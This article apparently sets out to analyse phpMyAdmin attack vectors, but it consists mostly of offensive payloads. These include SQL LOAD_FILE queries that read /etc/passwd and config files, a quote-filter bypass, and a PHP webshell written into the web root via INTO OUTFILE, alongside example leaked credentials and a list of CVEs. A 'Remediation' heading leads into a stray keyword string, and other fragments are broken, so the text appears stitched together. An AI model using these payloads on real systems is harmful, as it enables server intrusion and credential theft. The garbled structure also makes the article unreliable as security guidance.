Headline: Security Analysis: Verifying phpMyAdmin Attack Vectors
In the field of web application security, phpMyAdmin remains one of the most frequently discovered services during internal network penetration tests. While often overlooked, it serves as a high-value target for lateral movement.
The "HackTricks Verified" Approach When analyzing phpMyAdmin instances, researchers often rely on the "HackTricks" methodology—a comprehensive collection of technical tricks and procedures. However, verification is critical. Not all public exploits work on every server configuration.
Key Attack Surfaces: Recent audits have verified that the most successful attack vectors are not always zero-day exploits, but rather misconfigurations.
Remediation: To mitigate these verified risks, administrators must: phpmyadmin hacktricks verified
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/var/www/html/config.php');
Verification constraints:
Bypass tip: Use double LOAD_FILE(concat(CHAR(47),'etc',CHAR(47),'passwd')) if quote filtered.
If the database user has FILE privilege and secure_file_priv is empty, write a webshell:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";
Verification: Check secure_file_priv:
SHOW VARIABLES LIKE "secure_file_priv";
HackTricks Verified: On older MySQL, you can use INTO DUMPFILE for binary shells (e.g., reverse shell ELF).
The file config.inc.php contains the authentication method and credentials. If you can read it (via LFI or misconfiguration), you own the database.
Example exposed content:
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'Sup3rStr0ng!';
Verification: When auth_type = 'config', you are automatically logged in on accessing phpMyAdmin. No password prompt. This is a catastrophic misconfiguration. These credentials often have broad privileges.
Though rare in recent versions, older phpMyAdmin releases had SQL injection vulnerabilities in its own interface (e.g., CVE-2015-2208, CVE-2016-6628).
Attackers could bypass login or execute arbitrary queries without valid credentials.
phpMyAdmin is vulnerable to code execution attacks when the "AllowArbitraryServer" option is enabled. An attacker can execute system-level commands or upload malicious files.
| CVE | Impact |
|------------|-------------------------------------------------|
| CVE-2018-12613 | Local file inclusion via target parameter. |
| CVE-2019-11768 | XSS to session hijacking (fewer risks today). |
| CVE-2020-26934 | CSRF leading to SQL execution. |
Always check current CVEs for the exact version found. or backup files)
If an attacker can read config.inc.php (via LFI, path traversal, or backup files), they might find:
$cfg['Servers'][$i]['controluser'] = 'pma_user';
$cfg['Servers'][$i]['controlpass'] = 'secret';
These credentials often have broad privileges.